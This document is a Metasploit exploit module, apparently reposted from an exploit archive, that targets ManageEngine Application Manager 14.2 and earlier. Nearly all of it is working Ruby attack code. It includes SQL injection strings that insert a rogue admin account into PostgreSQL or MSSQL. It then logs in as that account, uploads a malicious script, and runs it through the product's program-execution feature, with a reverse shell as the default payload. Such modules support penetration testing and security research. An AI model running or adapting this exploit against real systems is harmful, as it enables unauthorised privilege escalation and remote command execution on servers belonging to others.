Exploit for ManageEngine Application Manager 14.2 Privilege Escalation / Remote Command Execution

Name: Exploit for ManageEngine Application Manager 14.2 Privilege Escalation / Remote Command Execution
Rating: 5 (136 reviews)
2019-08-12 | CVSS 1.1
## https://sploitus.com/exploit?id=PACKETSTORM:154026
##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "ManageEngine Application Manager v14.2 - Privilege Escalation / Remote Command Execution",  
'Description' => %q(  
This module exploits sqli and command injection vulnerability in the ME Application Manager v14.2 and prior versions.  
  
Module creates a new admin user with SQLi (MSSQL/PostgreSQL) and provides privilege escalation.  
Therefore low authority user can gain the authority of "system" on the server.   
It uploads malicious file using the "Execute Program Action(s)" feature of Application Manager.  
  
/////// This 0day has been published at DEFCON-AppSec Village. ///////  
  
),  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus  
],  
'References' =>  
[  
[ 'URL', 'http://pentest.com.tr/exploits/DEFCON-ManageEngine-APM-v14-Privilege-Escalation-Remote-Command-Execution.html' ]  
],  
'DefaultOptions' =>  
{  
'WfsDelay' => 60,  
'RPORT' => 9090,  
'SSL' => false,  
'PAYLOAD' => 'generic/shell_reverse_tcp'  
},  
'Privileged' => true,  
'Payload' =>  
{  
'DisableNops' => true,  
},  
'Platform' => ['unix', 'win'],  
'Targets' =>  
[  
[ 'Windows Target',  
{  
'Platform' => ['win'],  
'Arch' => ARCH_CMD,  
}  
],  
[ 'Linux Target',  
{  
'Platform' => ['unix'],  
'Arch' => ARCH_CMD,  
'Payload' =>  
{  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
}  
}  
}  
]  
],  
'DisclosureDate' => '10 August 2019 //DEFCON',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('USERNAME', [true, 'OpManager Username']),  
OptString.new('PASSWORD', [true, 'OpManager Password']),  
OptString.new('TARGETURI', [true, 'Base path for ME application', '/'])  
],self.class)  
end  
  
def check_platform(cookie)  
  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'showTile.do'),  
'cookie' => cookie,  
'vars_get' => {  
'TileName' => '.ExecProg',  
'haid' => 'null',  
}  
)  
if res && res.code == 200 && res.body.include?('createExecProgAction')  
@dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0]  
if @dir =~ /:/  
platform = Msf::Module::Platform::Windows  
else   
platform = Msf::Module::Platform::Unix  
end  
else  
fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')  
end  
file_up(cookie, platform, @dir)  
end  
  
def file_up(cookie, platform, dir)  
if platform == Msf::Module::Platform::Windows  
filex = ".bat"  
else  
if payload.encoded =~ /sh/  
filex = ".sh"  
elsif payload.encoded =~ /perl/  
filex = ".pl"  
elsif payload.encoded =~ /awk 'BEGIN{/  
filex = ".sh"  
elsif payload.encoded =~ /python/  
filex = ".py"  
elsif payload.encoded =~ /ruby/  
filex = ".rb"  
else  
fail_with(Failure::Unknown, 'Payload type could not be checked!')  
end  
end  
  
@fname= rand_text_alpha(9 + rand(3)) + filex  
data = Rex::MIME::Message.new  
data.add_part('./', nil, nil, 'form-data; name="uploadDir"')  
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")  
  
res = send_request_cgi({  
'method' => 'POST',   
'data' => data.to_s,  
'agent' => 'Mozilla',  
'ctype' => "multipart/form-data; boundary=#{data.bound}",  
'cookie' => cookie,  
'uri' => normalize_uri(target_uri, "Upload.do")   
})  
  
if res && res.code == 200 && res.body.include?('icon_message_success')  
print_good("#{@fname} malicious file has been uploaded.")  
create_exec_prog(cookie, dir, @fname)  
else  
fail_with(Failure::Unknown, 'The file could not be uploaded!')  
end  
end  
  
def create_exec_prog(cookie, dir, fname)  
  
@display = rand_text_alphanumeric(7)  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'adminAction.do'),  
'cookie' => cookie,  
'vars_post' => {  
'actions' => '/showTile.do?TileName=.ExecProg&haid=null',  
'method' => 'createExecProgAction',  
'id' => 0,  
'displayname' => @display,  
'serversite' => 'local',  
'choosehost' => -2,  
'abortafter' => 5,  
'command' => fname,  
'execProgExecDir' => dir,  
'cancel' => 'false'  
}  
)  
  
if res && res.code == 200 && res.body.include?('icon_message_success')  
actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0]   
print_status("Transactions completed. Attempting to get a session...")  
exec(cookie, actionid)  
else  
fail_with(Failure::Unreachable, 'Connection error occurred!')  
end  
end  
  
def exec(cookie, action)  
send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'common', 'executeScript.do'),  
'cookie' => cookie,  
'vars_get' => {  
'method' => 'testAction',  
'actionID' => action,  
'haid' => 'null'  
}  
)  
end  
  
def peer  
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"  
end  
  
def print_status(msg='')  
super("#{peer} - #{msg}")  
end  
  
def print_error(msg='')  
super("#{peer} - #{msg}")  
end  
  
def print_good(msg='')  
super("#{peer} - #{msg}")  
end   
  
def check  
  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'index.do'),  
)  
# For this part the build control will be placed.  
if res && res.code == 200 && res.body.include?('Build No:142')  
return Exploit::CheckCode::Vulnerable  
else   
return Exploit::CheckCode::Safe  
end  
end  
  
def app_login  
  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'applications.do'),  
)  
  
if res && res.code == 200 && res.body.include?('.loginDiv')  
@cookie = res.get_cookies  
  
res = send_request_cgi(  
'method' => 'POST',  
'cookie' => @cookie,  
'uri' => normalize_uri(target_uri.path, '/j_security_check'),  
'vars_post' => {  
'clienttype' => 'html',  
'j_username' => datastore['USERNAME'],  
'j_password' => datastore['PASSWORD'],  
'submit' => 'Login'  
}  
)  
  
if res && res.code == 303  
res = send_request_cgi(  
'cookie' => @cookie,  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'applications.do'),  
)  
  
@cookie = res.get_cookies  
send_sqli(@cookie)  
else  
fail_with(Failure::NotVulnerable, 'Failed to perform privilege escalation!')  
end   
  
else  
fail_with(Failure::Unreachable, 'Connection error occurred! User information is incorrect.')  
end  
end  
  
def exploit  
unless Exploit::CheckCode::Vulnerable == check  
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')  
end  
app_login  
end  
  
def send_sqli(cookies)  
  
@uname = Rex::Text.rand_text_alpha_lower(6)  
uid = rand_text_numeric(3)  
apk = rand_text_numeric(6)   
@pwd = rand_text_alphanumeric(8+rand(9))  
@uidCHR = "#{uid.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"  
@unameCHR = "#{@uname.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"  
@apkCHR = "#{apk.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"  
@adm = "CHAR(65)+CHAR(68)+CHAR(77)+CHAR(73)+CHAR(78)"  
pg_user =""   
pg_user << "1;insert+into+AM_UserPasswordTable+(userid,username,password)+values+"  
pg_user << "($$#{uid}$$,$$#{@uname}$$,$$#{Rex::Text.md5(@pwd)}$$);"  
pg_user << "insert+into+Am_UserGroupTable+(username,groupname)+values+($$#{@uname}$$,$$ADMIN$$);--+"  
ms_user =""  
ms_user << "1 INSERT INTO AM_UserPasswordTable(userid,username,password,apikey) values (#{@uidCHR},"  
ms_user << " #{@unameCHR}, 0x#{Rex::Text.md5(@pwd)}, #{@apkCHR});"  
ms_user << "INSERT INTO AM_UserGroupTable(username,groupname) values (#{@unameCHR}, #{@adm})--"  
  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, '/jsp/NewThresholdConfiguration.jsp?resourceid=' + pg_user + '&attributeIDs=17,18&attributeToSelect=18'),  
'cookie' => cookies  
)  
  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, '/jsp/NewThresholdConfiguration.jsp?resourceid=' + ms_user + '&attributeIDs=17,18&attributeToSelect=18'),  
'cookie' => cookies  
)  
  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'applications.do'),  
)  
  
if res && res.code == 200 && res.body.include?('.loginDiv')  
@cookie = res.get_cookies  
  
res = send_request_cgi(  
'method' => 'POST',  
'cookie' => @cookie,  
'uri' => normalize_uri(target_uri.path, '/j_security_check'),  
'vars_post' => {  
'clienttype' => 'html',  
'j_username' => @uname,  
'j_password' => @pwd,  
'submit' => 'Login'  
}  
)  
print @uname + "//" + @pwd  
puts res.body  
if res && res.code == 303  
print_good("Privilege Escalation was successfully performed.")  
print_good("New APM admin username = " + @uname)  
print_good("New APM admin password = " + @pwd)  
res = send_request_cgi(  
'cookie' => @cookie,  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'applications.do'),  
)  
  
@cookie = res.get_cookies  
check_platform(@cookie)  
else  
fail_with(Failure::NotVulnerable, 'Failed to perform privilege escalation!')  
end  
else  
fail_with(Failure::NotVulnerable, 'Something went wrong!')  
end  
end  
end